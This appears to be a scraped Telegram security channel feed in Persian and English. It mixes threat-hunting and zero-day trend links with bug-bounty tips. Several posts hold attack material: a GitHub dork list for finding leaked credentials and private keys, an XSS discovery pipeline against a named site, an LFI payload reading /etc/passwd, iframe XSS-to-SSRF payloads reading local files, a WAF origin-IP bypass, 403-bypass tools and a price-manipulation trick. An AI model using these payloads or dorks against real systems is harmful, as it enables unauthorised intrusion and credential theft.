ترند های آسیب پذیری روز صفر در سال 2024

https://www.csoonline.com/article/3629815/top-7-zero-day-exploitation-trends-of-2024.html

🔹 Share & Support Us 🔹
📱 Channel : @Engineer_Computer

مثال از نمونه هانت

عنوان
شماره
پیشینه
فرضیه هانت
اسکپ و گستره هانت
تکنیک های مورد استفاده
روش انجام کار
منابع داده که برای انجام عملیات هانت مورد نیاز هستند


یک نمونه خوبی هست که بصورت عملی یک دید از هانت و شکار تهدید داشته باشید .
نقطه ثقل مساله؛ فرضیه سازی و بعد تعیین منبع داده برای شکار است.

🔹 Share & Support Us 🔹
📱 Channel : @Engineer_Computer

👻گزارش تحلیلی هفته

https://www.proofpoint.com/us/blog/threat-insight/hidden-plain-sight-ta397s-new-attack-chain-delivers-espionage-rats

🔹 Share & Support Us 🔹
📱 Channel : @Engineer_Computer

ابزار هفته

https://github.com/WithSecureLabs/C3

🔹 Share & Support Us 🔹
📱 Channel : @Engineer_Computer

تشخیص سریع Beaconing در C2 امری واجب هست.
اما برخی موارد نیاز به استفاده از ابزارهای آماری و علم داده میباشد
تز زیر خوب به این موضوع پرداخته

https://opus4.kobv.de/opus4-haw/frontdoor/deliver/index/docId/3617/file/I001350222Thesis.pdf

🔹 Share & Support Us 🔹
📱 Channel : @Engineer_Computer

چرا فراگیری ISSMP در دنیای امروزی برای مدیران امنیت ضروری است؟

CISO 2.0

نیاز به مدیرانی با دانش استراتژیک فراتر از فنون امنیت

🔹 Share & Support Us 🔹
📱 Channel : @Engineer_Computer

🔥🔥Github-Dork🚀🚀🔥🔥

Happy Hunting

🔍 api_key
🔍 app_AWS_SECRET_ACCESS_KEY
🔍 app_secret
🔍 authoriztion
🔍 Ldap
🔍 aws_access_key_id
🔍 secret
🔍 bash_history
🔍 bashrc%20password
🔍 beanstalkd
🔍 client secre
🔍 composer
🔍 config
🔍 credentials
🔍 DB_PASSWORD
🔍 dotfiles
🔍 .env file
🔍 .exs file
🔍 extension:json mongolab.com
🔍 extension:pem%20private
🔍 extension:ppk private
🔍 extension:sql mysql dump
🔍 extension:yaml mongolab.com
🔍 .mlab.com password
🔍 mysql
🔍 npmrc%20_auth
🔍 passwd
🔍 passkey
🔍 rds.amazonaws.com password
🔍 s3cfg
🔍 send_key
🔍 token
🔍 filename:.bash_history
🔍 filename:.bash_profile aws
🔍 filename:.bashrc mailchimp
🔍 filename:CCCam.cfg
🔍 filename:config irc_pass
🔍 filename:config.php dbpasswd
🔍 filename:config.json auths
🔍 filename:config.php pass
🔍 filename:config.php dbpasswd
🔍 filename:connections.xml
🔍 filename:.cshrc
🔍 filename:.git-credentials
🔍 filename:.ftpconfig
🔍 filename:.history
🔍 filename:gitlab-recovery-codes.txt
🔍 filename:.htpasswd
🔍 filename:id_rsa
🔍 filename:.netrc password
🔍 FTP
🔍 filename:wp-config.php
🔍 git-credentials
🔍 github_token
🔍 HEROKU_API_KEY language:json
🔍 HEROKU_API_KEY language:shell
🔍 GITHUB_API_TOKEN language:shell
🔍 oauth
🔍 OTP
🔍 databases password
🔍 [WFClient] Password= extension:ica
🔍 xoxa_Jenkins
🔍 security_credentials

#bugbountytips #GitHub

🔹 Share & Support Us 🔹
📱 Channel : @Engineer_Computer

SQL Injection Auth Bypass

🔹 Share & Support Us 🔹
📱 Channel : @Engineer_Computer

Public Bug Bounty Programs [Domain,Subdomain]
https://github.com/trickest/inventory

Public Bug Bounty Platforms Around The World
https://platforms.disclose.io/

Public Bug Bounty/ Penetration Testing Reports
https://github.com/reddelexc/hackerone-reports
https://github.com/juliocesarfort/public-pentesting-reports

Bug Bounty Books
https://github.com/akr3ch/BugBountyBooks
https://github.com/AnLoMinus/Bug-Bounty

Bug Bounty Youtube Channel
https://www.youtube.com/@BugBountyReportsExplained
https://www.youtube.com/@NahamSec
https://www.youtube.com/@STOKfredrik
https://www.youtube.com/channel/UCyBZ1F8ZCJVKSIJPrLINFyA
https://www.youtube.com/@InsiderPhD

Bug Bounty Hunter Twitter/Blog/etc
https://twitter.com/thedawgyg?lang=en
https://twitter.com/d00xing?lang=en
https://m0chan.github.io/
https://twitter.com/codecancare
http://ele7enxxh.com/
https://twitter.com/ele7enxxh?lang=en
https://twitter.com/orange_8361?lang=en
https://twitter.com/_godiego__?lang=en

🔹 Share & Support Us 🔹
📱 Channel : @Engineer_Computer

Find xss with this automation of the following work
1 subfinder -d indeed.com -o indeed.txt //Find Subdomains
2 httpx -l subdomains.txt -o httpx.txt // Live Subdomains
3 echo "indeed.com" | gau --threads 5 >> Enpoints.txt // Find Endpoints
4 cat httpx.txt | katana -jc >> Enpoints.txt // Find More Endpoints
5 cat Enpoints.txt | uro >> Endpoints_F.txt // Remove Duplicates
6 cat Endpoints_F.txt | gf xss >> XSS.txt // Filter Endpoints for XSS
7 cat XSS.txt | Gxss -p khXSS -o XSS_Ref.txt // Find reflected Parameters
8 dalfox file XSS_Ref.txt -o Vulnerable_XSS.txt // Find XSS

Script https://github.com/dirtycoder0124/xss

🔹 Share & Support Us 🔹
📱 Channel : @Engineer_Computer

🔹 Share & Support Us 🔹
📱 Channel : @Engineer_Computer

💎LFI TIP BY KANAHIYA💎

1- on visiting url http://domain.tld it were redirecting first to http://domain.tod/dir1/dir2 then to sso login

2- Fuzzed after first redirection

3- http://domain.tld/dir1/dir2/FUZZ

4- this payload leads to 200 ok & disclosed all local files

////////////////../../../../../../../../etc/passwd

5- tried other local files
/etc/hosts
/etc/shells
/proc/self/environ
/bin/sh

🔹 Share & Support Us 🔹
📱 Channel : @Engineer_Computer

Bug Bounty Tips: Discovering the Origin IP by scanning your target IP range

When you're hunting on a bug bounty target and WAF stands in your way, here's a powerful technique to uncover the Origin IP by scanning the target's IP range.

We'll be using a simple yet effective tool called hakoriginfinder by hakluke! Get it at https://github.com/hakluke/hakoriginfinder

Here's my methodology to find the Origin IP using this tool and technique:

Discover your target's ASN and check https://bgp.he.net/AS33848#_prefixes?

Make a note of the target's IP range.
Assuming you have a WAF-protected domain called example[.]com. Use this command with the IP range Identified in step 1 and pass your target host against the -h parameter:

prips 93.184.216.0/24 | hakoriginfinder -h example[.]com

If you receive a "MATCH" output, there's a strong likelihood that you've successfully identified the Origin IP. Now, you can send requests with the same Host header to bypass WAF or for whatever your mission requires. Happy hunting!

credit:- Jayesh

🔹 Share & Support Us 🔹
📱 Channel : @Engineer_Computer

Use these tools to bypass 403 most time it give false postive always check for content length.Both tool bypass protocol based,header based,path based and more techniques.
https://github.com/Dheerajmadhukar/4-ZERO-3
https://github.com/yunemse48/403bypasser

🔹 Share & Support Us 🔹
📱 Channel : @Engineer_Computer

⭐️𝐗𝐒𝐒 𝐭𝐨 𝐒𝐒𝐑𝐅 (𝐌𝐞𝐭𝐡𝐨𝐝 𝟐)⭐️

* Note this only works if proper sanitization is not performed and the server processes the payload server-side *

Input the following code in the vulnerable field:
<iframe src="http://localhost/some/directory"></iframe>

You can also read local files:
<iframe src="file:///C:/Windows/win.ini" width="500" height="500">

This is especially critical if an application is running on an EC2 instance that does not have IMDSv2 required.

🔹 Share & Support Us 🔹
📱 Channel : @Engineer_Computer

Price Manipulation Method

If the product price parameter cannot be changed, change the quantity of products.

items[1][quantity]=1 --> 234 €
items[1][quantity]=0.1 --> 23.4 €

🔹 Share & Support Us 🔹
📱 Channel : @Engineer_Computer

🔹 Share & Support Us 🔹
📱 Channel : @Engineer_Computer

🔹 Share & Support Us 🔹
📱 Channel : @Engineer_Computer

You can now passively enumerate all endpoints of a website with katana. (No need waybackurls)

Example:

echo nasa.gov | katana -passive -f qurl -pss waybackarchive,commoncrawl,alienvault | tee endpoints

You can then check the status of these endpoints or filter in order to find new vulnerabilities:

Example:

echo nasa.gov | katana -passive -f qurl -pss waybackarchive,commoncrawl,alienvault | httpx -mc 200 | grep -E '\.(js|php)$' | tee specificEndpoints

🔹 Share & Support Us 🔹
📱 Channel : @Engineer_Computer

دزدی داده از طریق ICMP

https://blog.bwlryq.net/posts/icmp_exfiltration

🔹 Share & Support Us 🔹
📱 Channel : @Engineer_Computer/

پرورش استعداد ها در امنیت سایبری

راهکار استراتژیک
🔹 Share & Support Us 🔹
📱 Channel : @Engineer_Computer